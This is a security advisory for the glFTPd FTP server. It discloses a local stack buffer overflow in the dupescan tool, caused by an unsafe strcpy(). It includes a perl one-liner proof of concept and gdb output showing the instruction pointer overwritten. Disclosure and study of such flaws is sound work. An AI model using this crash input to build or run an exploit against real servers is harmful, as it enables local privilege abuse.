------------------------------------------------- Program: glFTPd Homepage: http://www.glftpd.com Vulnerable Versions: glFTPd v2.00RC3 and prior Risk: Low / Medium Impact: Local Stack Buffer Overflow Vulnerability -------------------------------------------------
- DESCRIPTION ------------------------------------------------- glFTPd is a very advanced ftp server with lots of possibilities. One of the main differences between many other ftp servers and glFTPd is that it has its own user database which can be completely maintained online using ftp site commands. Using ftp site commands it is also possible to see stats, view logs, execute scripts and do many more things. glFTPd runs within a chroot environment which makes it relatively safe. The glFTPd team continuously works on improving this free piece of beautiful software.
- DETAILS ------------------------------------------------- This vulnerability is caused by an unsafe strcpy() that copies the entire parameter of the 'dupescan' to a stack buffer of 255 bytes.
coki_at_nosystem:~$ /glftpd/bin/dupescan `perl -e 'print "A" x 300'` Done Segmentation fault coki_at_nosystem:~$
coki_at_nosystem:~$ gdb /glftpd/bin/dupescan GNU gdb 6.1.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r `perl -e 'print "A" x 300'` Starting program: /glftpd/bin/dupescan `perl -e 'print "A" x 300'` Done
Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) quit The program is running. Exit anyway? (y or n) y coki_at_nosystem:~$
